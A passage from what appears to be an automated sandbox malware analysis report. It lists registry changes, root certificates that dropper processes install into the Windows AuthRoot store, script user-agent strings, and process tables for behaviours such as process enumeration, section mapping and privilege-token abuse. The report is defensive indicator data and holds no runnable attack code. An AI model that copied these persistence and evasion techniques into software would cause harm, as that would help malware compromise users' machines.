Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer | MicrosoftEdge.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" | msiexec.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\Total = "192" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C | svchost.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "91" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\ = "29" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\ = "159" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online\ = "1067" | MicrosoftEdgeCP.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{TKR9TRJ3-XT3I-VY52-597M-MXZ27DTVMS64} | rundll32.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature | msiexec.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\expensivesurvey.online | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "353" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\expensivesurvey.online\To = "0" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\MrtCache | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 | msiexec.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "48" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{WLD4WMQ3-MJ3I-MV57-663Y-EXT24WLKVJ14} | svchost.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\totalcoolblog.com\Total = "1398" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | MicrosoftEdgeCP.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{0489BC77-26F0-4846-880B-35B4DB5CF5FC} = "0" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "372" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus | MicrosoftEdgeCP.exe
-
Processes:
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob omitted] | installer.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob omitted] | installer.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | Altrove.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] | Altrove.exe.com
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted]
a2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Altrove.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 Altrove.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 Altrove.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 9 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
HTTP User-Agent header | 61 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 530 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 101 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 143 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 212 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 521 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 612 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 637 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 648 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, powershell.exe, run.exe, Wed09d27135e5a8b3b.tmp, Wed09b2a8bc4f16cb.exe, WerFault.exe, WerFault.exe, Explorer.EXE
pid | process
1812 | powershell.exe
1812 | powershell.exe
1988 | powershell.exe
1988 | powershell.exe
1988 | powershell.exe
1812 | powershell.exe
2848 | run.exe
2848 | run.exe
4612 | Wed09d27135e5a8b3b.tmp
4612 | Wed09d27135e5a8b3b.tmp
2848 | run.exe
2848 | run.exe
1988 | powershell.exe
1812 | powershell.exe
2080 | Wed09b2a8bc4f16cb.exe
2080 | Wed09b2a8bc4f16cb.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
3152 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
5268 | WerFault.exe
2888 | Explorer.EXE
2888 | Explorer.EXE
2888 | Explorer.EXE
2888 | Explorer.EXE
2888 | Explorer.EXE
2888 | Explorer.EXE
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
pid | process
2888 | Explorer.EXE
-
Suspicious behavior: MapViewOfSection 32 IoCs
Processes: Wed09b2a8bc4f16cb.exe, ZzEa6lWClVPLFIq3UqymzBXh.exe, AZncMKOcV3N_LXTxtk8_VdBl.exe, cmd.exe, 67j94FgroPgh6JIk3aUx67IB.exe, uphVV8ghcsrAKvTLycJGCo_b.exe, 9E51.exe, D800.exe, MicrosoftEdgeCP.exe, cbwcirj, MicrosoftEdgeCP.exe, uswcirj, cbwcirj
pid | process
2080 | Wed09b2a8bc4f16cb.exe
5000 | ZzEa6lWClVPLFIq3UqymzBXh.exe
5000 | ZzEa6lWClVPLFIq3UqymzBXh.exe
5000 | ZzEa6lWClVPLFIq3UqymzBXh.exe
1248 | AZncMKOcV3N_LXTxtk8_VdBl.exe
1248 | AZncMKOcV3N_LXTxtk8_VdBl.exe
1248 | AZncMKOcV3N_LXTxtk8_VdBl.exe
2316 | cmd.exe
2316 | cmd.exe
1164 | 67j94FgroPgh6JIk3aUx67IB.exe
6328 | uphVV8ghcsrAKvTLycJGCo_b.exe
9212 | 9E51.exe
2292 | D800.exe
2316 | cmd.exe
2316 | cmd.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
8352 | cbwcirj
2316 | cmd.exe
2316 | cmd.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
6604 | MicrosoftEdgeCP.exe
5820 | MicrosoftEdgeCP.exe
5820 | MicrosoftEdgeCP.exe
5136 | uswcirj
1988 | cbwcirj
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes: 14498.exe
pid | process
5184 | 14498.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: Wed096a1bff61.exe, Wed09db0d52c38.exe, powershell.exe, Wed09b3a5ca1a712d390.exe, powershell.exe, BCleanSoft82.exe, 4.exe, 5.exe, taskkill.exe, WerFault.exe, 10.exe, WerFault.exe, Explorer.EXE, Calculator.exe, WerFault.exe
description | pid | process
Token: SeDebugPrivilege | 2484 | Wed096a1bff61.exe
Token: SeCreateTokenPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeAssignPrimaryTokenPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeLockMemoryPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeIncreaseQuotaPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeMachineAccountPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeTcbPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeSecurityPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeTakeOwnershipPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeLoadDriverPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeSystemProfilePrivilege | 1108 | Wed09db0d52c38.exe
Token: SeSystemtimePrivilege | 1108 | Wed09db0d52c38.exe
Token: SeProfSingleProcessPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeIncBasePriorityPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeCreatePagefilePrivilege | 1108 | Wed09db0d52c38.exe
Token: SeCreatePermanentPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeBackupPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeRestorePrivilege | 1108 | Wed09db0d52c38.exe
Token: SeShutdownPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeDebugPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeAuditPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeSystemEnvironmentPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeChangeNotifyPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeRemoteShutdownPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeUndockPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeSyncAgentPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeEnableDelegationPrivilege | 1108 | Wed09db0d52c38.exe
Token: SeManageVolumePrivilege | 1108 | Wed09db0d52c38.exe
Token: SeImpersonatePrivilege | 1108 | Wed09db0d52c38.exe
Token: SeCreateGlobalPrivilege | 1108 | Wed09db0d52c38.exe
Token: 31 | 1108 | Wed09db0d52c38.exe
Token: 32 | 1108 | Wed09db0d52c38.exe
Token: 33 | 1108 | Wed09db0d52c38.exe
Token: 34 | 1108 | Wed09db0d52c38.exe
Token: 35 | 1108 | Wed09db0d52c38.exe
Token: SeDebugPrivilege | 1812 | powershell.exe
Token: SeDebugPrivilege | 2656 | Wed09b3a5ca1a712d390.exe
Token: SeDebugPrivilege | 1988 | powershell.exe
Token: SeDebugPrivilege | 2632 | BCleanSoft82.exe
Token: SeDebugPrivilege | 2400 | 4.exe
Token: SeDebugPrivilege | 1976 | 5.exe
Token: SeDebugPrivilege | 2248 | taskkill.exe
Token: SeRestorePrivilege | 3152 | WerFault.exe
Token: SeBackupPrivilege | 3152 | WerFault.exe
Token: SeDebugPrivilege | 3152 | WerFault.exe
Token: SeDebugPrivilege | 1360 | 10.exe
Token: SeDebugPrivilege | 5268 | WerFault.exe
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeDebugPrivilege | 5728 | Calculator.exe
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
Token: SeCreatePagefilePrivilege | 2888 | Explorer.EXE
Token: SeDebugPrivilege | 5948 | WerFault.exe
Token: SeShutdownPrivilege | 2888 | Explorer.EXE
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes: setup.exe, run2.exe, Wed09d27135e5a8b3b.tmp, Explorer.EXE, Altrove.exe.com, Altrove.exe.com, Altrove.exe.com
pid | process
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4612 | Wed09d27135e5a8b3b.tmp
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
2888 | Explorer.EXE
2888 | Explorer.EXE
2888 | Explorer.EXE
2888 | Explorer.EXE
1548 | Altrove.exe.com
2888 | Explorer.EXE
2888 | Explorer.EXE
1548 | Altrove.exe.com
1548 | Altrove.exe.com
1392 | Altrove.exe.com
1392 | Altrove.exe.com
1392 | Altrove.exe.com
3004 | Altrove.exe.com
3004 | Altrove.exe.com
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes: setup.exe, run2.exe, Altrove.exe.com, Altrove.exe.com, Altrove.exe.com, Altrove.exe.com, Altrove.exe.com, Altrove.exe.com
pid | process
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
5088 | setup.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
4208 | run2.exe
1548 | Altrove.exe.com
1548 | Altrove.exe.com
1548 | Altrove.exe.com
1392 | Altrove.exe.com
1392 | Altrove.exe.com
1392 | Altrove.exe.com
3004 | Altrove.exe.com
3004 | Altrove.exe.com
3004 | Altrove.exe.com
2180 | Altrove.exe.com
2180 | Altrove.exe.com
2180 | Altrove.exe.com
592 | Altrove.exe.com
592 | Altrove.exe.com
592 | Altrove.exe.com
3476 | Altrove.exe.com
-
Suspicious use of SetWindowsHookEx 9 IoCs
Processes: MicrosoftEdge.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe, MicrosoftEdge.exe, MicrosoftEdgeCP.exe
pid | process
5424 | MicrosoftEdge.exe
3248 | MicrosoftEdge.exe
